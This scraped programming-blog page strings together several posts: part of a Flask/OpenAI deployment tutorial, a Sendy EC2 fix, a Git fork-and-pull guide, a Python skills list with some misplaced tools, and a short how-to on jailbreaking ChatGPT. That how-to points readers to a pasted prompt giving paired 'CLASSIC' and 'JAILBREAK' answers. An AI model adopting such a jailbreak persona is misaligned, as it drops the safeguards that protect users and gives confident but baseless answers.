</head> <body> <img src="{{ url_for('static', filename='movie.png') }}" class="icon" /> <h3>Recommend the top movies</h3> <form action="/" method="post"> <input type="text" name="number" placeholder="How many proposals, e.g. 1,3,10" required /> <input type="text" name="category" placeholder="Enter the category e.g. thriller, comedy" required /> <input type="submit" value="Generate titles" /> </form> {% if result %} <div class="result"> <pre>{{ result | safe }}</pre> </div> {% endif %}
</body>

I will not go over the HTML tags as these should be familiar to you, and if not, you can get yourself up to speed with that using other web sources.

Initially, the file will feel like an ordinary HTML/CSS site, but after a while, you will notice a strange animal.  It is placed here at the bottom of the file.

 {% if result %} <div class="result"> {{ result }} </div> {% endif %}

This is where Python co-exists with HTML and allows the β€œresult” that we generate in our β€œPython backend” to be passed over to the β€œFlask frontend”. If it exists, the flask engine will render the website with the results at the bottom.

Run the App Locally

Running an app is simple. I just run the index.py file.

With the β€œhost” and β€œport” attributes specified in the index.py file, Flask will run a local web server with the site.

This is how it looks in my Visual Studio Code:

And this is the browser view:

Vercel deployment

Alright, the app is built and works fine on my local machine. 

Now – let’s get it shipped to the world!

First, I put the whole project into my personal GitHub repo. I am using a public one just so that you and other readers can use it. Yet, if you follow my steps here, I would suggest a private one to you.

πŸ›‘ Warning: The risk with public repo is that it exposes your OpenAI secret key to the world! That would be identified anyways, and your key would rotate, but why bother?

Now, I log in to the Vercel dashboard and click on β€œAdd New…” and select β€œProject”.

Selecting GitHub as Git provider.

Selecting the repository and importing it.

Arrived at the β€œYou’re almost done.” page. There is no need to alter any of the default parameters there except adding one important variable. In environment variables, I add my own unique OPENAI_API_KEY.

Making sure this is indeed saved properly.

This is it. Hitting β€œDeploy” and watching the wheels spin.

Vercel builds it for me and assigns some public domains to the app.

Once I arrive at the final page, I open up the app, test it again and if all works ok, share with the family & friends & Finxter readers! 

If you liked this journey, you can give me a star in my GitHub repo or this article πŸ˜‰ 

Any doubts or comments, drop me a line.

πŸ’» Try It Yourself: You can play with the live demo here.

Happy coding!

Get Your Personal Certificate Proving Your ChatGPT-Powered Coding Skills

If you’re a premium member, you can also go through this mini-course project on the Finxter Academy and certify your newly-acquired skills.

I’m sure many employers and clients would love to hire coders that can use the latest technological disruptions to build advanced applications (that are also easy to develop). πŸ˜‰

Posted on Leave a comment

[Fixed] Sendy Loading Lists Not Working (Loads Forever)

5/5 – (1 vote)

If you’re landing here, chances are you run a Sendy instance on Amazon EC2 hosting “Simple Email Service (SES)” for email marketing and experience the following problem:

  • Error 1: “View All Lists” Not Working/Loading
  • Error 2: “Send Newsletter Now!” Not Working/Loading (Recipients loads forever)

Here’s a screenshot on my Sendy instance — the lists don’t load!

Error 1: “View All Lists” Not Working/Loading
Error 2: “Send Newsletter Now!” Not Working/Loading (Recipients loads forever)

How to Fix?

To fix these two errors, you simply need a bigger Amazon EC2 instance in all likelihood. Per default, Sendy installs the Amazon t2.micro instance that has only 1 GiB of memory.

For large lists, however, this is not enough. The instance is likely overwhelmed with all the list data if you have, say, 100k+ subscribers. To overcome the small memory, the instance needs to store parts of the “memory data” (i.e., the list) on stable storage, which reduces performance by orders of magnitude. Hence, the timeout on all major browsers.

Amazon EC2 instance types

How to Increase the EC2 Instance Running SES?

To increase the capabilities of your instance and fix this error, just follow these three steps:

  • Step 1: Stop the instance at the Amazon EC2 region: https://eu-central-1.console.aws.amazon.com/ec2/home
  • Step 2: Wait for the instance to stop and change the instance type from t2.micro to t2.small to double its memory capabilities. If you need more power later, try to increase it even more. See instance types here.
  • Step 3: Restart the instance again. And voilΓ  – your Sendy installation should work again!

See here: https://sendy.co/forum/discussion/669/ec2-micro-strong-enough-to-sendy-50k-mails

I hope this worked for you – thanks for checking out this tutorial! β™₯

Posted on Leave a comment

How to Jailbreak ChatGPT (… and What’s 1 BTC Worth in 2030?)

5/5 – (1 vote)

ChatGPT has reduced the price for intelligence by 10,000x.

However, many believe the answers are too politically correct, woke, or generic.

For example, ask ChatGPT about the price of Bitcoin in the year 2030 and you’ll get the following mouthful:

Boooooring! πŸ₯±

To play with a more interesting version of ChatGPT and get “unfiltered” and sometimes extreme answers, you must jailbreak it.

For example, here’s ChatGPT answer to the price of Bitcoin after you jailbreak it:

1 billion USD per BTC. That’s more like it! 🀯

But how do you actually “set ChatGPT free”?

Step 1: Visit GitHub Jailbreak Repository

Visit the GitHub repository https://github.com/gayolGate/gayolGate/blob/index/ChatGPTJailbreak and copy the whole prompt of the single ChatGPTJailbreak file in the repository.

Step 2: Open ChatGPT and Paste the Whole Prompt

Go to https://chat.openai.com and paste the whole GitHub jailbreaking prompt into the first Chat prompt.

Step 3: ChatGPT is Now Free!

Congratulations, ChatGPT is now free. You can ask it anything and will always give you the answer in two formats:

  • [🔒CLASSIC] This is the standard answer you’d receive without the jailbreak.
  • [🔓JAILBREAK] This is the “free” answer without limitations.

Just make sure you don’t trust it just because it’s free. It doesn’t mean it knows the answer, it just means it gives you any answer and its behavior is just more free and radical (and, possibly, more harmful as well).

Have fun — and use your new power wisely and responsibly! βœ…πŸ•Š

Posted on Leave a comment

GitHub Fork and Pull Workflow

5/5 – (1 vote)

If you are unfamiliar with git and/or GitHub, it can be overwhelming navigating all the different workflow models you can use to add code to a repository. I know this feeling well, as it took me a while to get used to new workflows after being used to the classic SVN (years ago in University).

This post will focus on the common fork and pull workflow model that is used by many GitHub repositories. It will provide the necessary git commands and a short description for each step of the workflow, specifically for Git beginners who may be hesitant to contribute to GitHub.

πŸ’‘ Definition: A repository is a central location that holds data. It’s mostly used to store and manage code, documents, images, videos, and other data types. Repositories can be either public or private and are often used by software developers to store and collaborate on projects.

Fork and Pull Workflow In a Nutshell

The “Fork & Pull” workflow is a way to contribute changes to an original repository using three easy steps:

  • Step 1: create a personal copy (fork) of the repository,
  • Step 2: edit the fork, and
  • Step 3: submit a request (pull request) to the owner of the original repository to merge your changes.

Step 1: Create a Fork

πŸ’‘ Definition: A fork is a copy of a repository. Forking a repository allows you to freely experiment with changes without affecting the original project. Forks are commonly used to either propose changes to someone else’s project or to use someone else’s project as a starting point for your own idea.

Creating a fork on GitHub is easy – just click the “Fork” button on the repository page.

Here’s how forking the TensorFlow repository looks like — easy:

Step 2: Clone and Edit Fork

Once you have your fork, you can clone it to your local machine and edit it.

Here’s where you actually change or add code files, find and remove bugs, write comments for the code, or refactor everything.

πŸ’‘ Definition: If you clone a Git repository, you essentially create an identical copy. You clone to work on your own local copy of the repository and sync changes back to the original repository. This is useful for keeping your local copy up to date with the latest changes and for contributing changes back to the original repository.

Step 3: Push Changes to Fork and Perform Pull Request

When you are done, you push your changes back to the fork on GitHub.

πŸ’‘ Definition: A Git push operation is the process of sending changes from a local repository to a remote repository. The changes are applied to the remote repository. And your local repository is synchronized with the remote repository.

Lastly, you submit a pull request to the owner of the original repository.

πŸ’‘ Definition: A pull request is a request to merge a branch into the main branch of a repository. It is used to propose changes and request feedback from other contributors, who can accept or reject the changes based on their review.

If there are no merge conflicts, the owner can simply click the “merge” button to accept your changes.

Six Steps to Pull Request

To create a pull request, you need to:

  1. Fork the repository on GitHub.
  2. Clone your fork to your workspace with the git clone command.
  3. Modify the code and commit the changes to your local clone.
  4. Push your changes to your remote fork on GitHub.
  5. Create a pull request on GitHub and wait for the owner to merge or comment your changes.
  6. If the owner suggests changes, push them to your fork, and the pull request will be updated automatically.

What If Multiple Devs Work In Parallel?

If multiple developers work in parallel on the same repository, it may happen that they work on step 3 in parallel and try to push changes to the remote fork at the same time.

Here’s my drawing of this scenario. πŸ˜†

Add the original repository as a remote repository called “upstream”:

git remote add upstream https://github.com/OWNER/REPOSITORY.git

Fetch all changes from the upstream repository:

git fetch upstream

Switch to the master branch of your fork:

git checkout master

Merge changes from the upstream repository into your fork:

git merge upstream/master

If you are working on multiple features, you should isolate them from each other. To do this, create a separate branch for each feature.

  • Use the command git checkout -b BRANCHNAME to create and switch to a new branch.
  • Upload the branch to the remote fork with git push --set-upstream origin BRANCHNAME.
  • To switch between branches, use git checkout BRANCHNAME.
  • To create a pull request from a branch, go to the GitHub page of that branch and click the β€œpull request” button.

To update a feature branch:

  1. Switch to the feature branch: git checkout my-feature-branch
  2. Commit all changes: git commit -m MESSAGE
  3. Update the feature branch by rebasing it from the master branch: git rebase master

Why I Wrote This

I wrote this short tutorial to help contributors to our real-world practical project to build a P2P social network for information dissemination that is structured like a big brain. Users are neurons. Connections are synapses. Information Impulses spread through neurons “firing” and travel over synapses in a decentralized way:

πŸ‘‰ Recommended: Peer Brain – A Decentralized P2P Social Network App

If you like the tutorial and you want to contribute to this open-source social network app, feel free to try out this workflow yourself on this GitHub repository! ‴

Summary

The Fork and Pull Workflow is a popular collaboration model used during software development.

In this workflow, a user forks a repository from an original (=upstream) repository, then develops and maintains a separate copy of the codebase on their own fork.

Users can then make changes to their own version of the repository, commit them, and push them up to their own fork. If the user wants to contribute their changes back to the upstream repository, they can then create a pull request. This allows the upstream maintainer to review the changes and determine if they should be merged into the main codebase.

The Fork and Pull Workflow is so popular for collaboration on a common code base because developers can work independently on the code and synchronize on the upstream repos in a well-structured and organized way.

This workflow also benefits upstream maintainers, as they don’t have to manage multiple contributions coming in from multiple sources.

πŸ‘‰ Recommended: Peer Brain – A Decentralized P2P Social Network App

Posted on Leave a comment

10 Essential Skills for Python Practitioners and Tools to Master Them (2023)

5/5 – (1 vote)

Python is one of the most powerful and versatile programming languages available today. It is used in multiple fields, including web development, data science, artificial intelligence, and more.

As a result, Python practitioners need to have a broad range of skills to be successful. Here, we will discuss the top 10 skills to learn as a Python practitioner.

Note that I focused only on coding-related skills, not on soft skills such as communication or “agile software development“. These are vital but not part of this article.

Skill #1: Object-Oriented Programming (OOP)

Object-Oriented Programming (OOP) is a programming paradigm that uses objects and classes to organize and manage code.

πŸ‘‰ Recommended: Python Classes — An Introduction

OOP is a fundamental skill for Python practitioners, as it allows for the creation of efficient, robust, and reusable code. To be an effective Python programmer, you must understand the principles of OOP and be able to apply them in your code.

Specific subskills to master:

Skill #2: Data Structures and Algorithms

Data Structures and Algorithms are essential for any programmer. Data Structures are collections of data that are organized in a specific way, such as an array or linked list. Algorithms are sets of instructions used to solve specific problems. Knowing how to work with and optimize data structures and algorithms are essential for any Python practitioner.

Specific subskills to master:

Skill #3: Web Development

Web Development is the process of building, creating, and maintaining websites and web applications. Python is a popular choice for web development, as it is relatively easy to learn and offers a wide range of tools and frameworks. Developing web applications with Python is a must-have skill for Python practitioners.

πŸ‘‰ Recommended: Full-Stack Web Developer — Income and Opportunity

Specific subskills to master:

Skill #4: Machine Learning (ML)

Machine Learning (ML) is a subset of Artificial Intelligence (AI) that enables machines to learn from data and make predictions. Python has become the go-to language for ML due to its rich and powerful libraries. To be successful in ML, Python practitioners must understand the fundamentals of ML and be able to work with ML libraries and frameworks.

Specific subskills to master:

Skill #5: Data Analysis

Data Analysis is the process of gathering, cleaning, and interpreting data to generate insights and inform decisions. Python is an excellent language for data analysis due to its powerful libraries and tools. Knowing how to work with data in Python is an essential skill for any Python practitioner.

Specific subskills to master:

Skill #6: Automation

Automation is the process of using programming to automate mundane or repetitive tasks. Python is a popular choice for automation due to its easy-to-learn syntax and powerful libraries. Knowing how to use Python for automation can save time and allow for more efficient workflows.

Specific subskills to master:

  • Bash
  • Ansible
  • Puppet
  • Chef

Skill #7: GUI Development

GUI Development is the process of creating graphical user interfaces (GUIs) for applications. Python offers a wide range of GUI development frameworks and libraries, making it an excellent choice for GUI development. To be successful in GUI development, Python practitioners must know how to work with GUI frameworks and libraries.

Specific subskills to master:

  • Tkinter
  • PyQt
  • PyGTK
  • wxPython
  • PyGUI

Skill #8: Web Scraping

Web Scraping is the process of extracting data from websites. Python is an excellent language for web scraping due to its powerful libraries and tools. Knowing how to scrape websites using Python is an essential skill for any Python practitioner.

Specific subskills to master:

Skill #9: Scripting

Scripting is the process of writing scripts to automate mundane or repetitive tasks. Python is a popular language for scripting due to its easy-to-learn syntax and powerful libraries. Knowing how to script in Python can save time and allow for more efficient workflows.

Specific subskills to master:

Skill #10: Data Visualization

Data Visualization is the process of creating visual representations of data. Python offers a wide range of data visualization libraries and tools, making it an excellent choice for data visualization. Knowing how to create effective visualizations with Python is an essential skill for any Python practitioner.

Specific subskills to master:

  • Matplotlib
  • Seaborn
  • ggplot2
  • Bokeh
  • Plotly
  • Dash

πŸ“– Further Learning: For a complete guide on how to build your beautiful dashboard app in pure Python, check out our best-selling book Python Dash with San Francisco Based publisher NoStarch.

Conclusion

In conclusion, the top 10 skills to learn as a Python practitioner are object-oriented programming, data structures and algorithms, web development, machine learning, data analysis, automation, GUI development, web scraping, scripting, and data visualization.

Each of these skills is essential for success as a Python practitioner and can help you create powerful and efficient applications.

πŸ‘‰ Recommended: 20 Real-Life Skills You Need as a UI Developer in 2023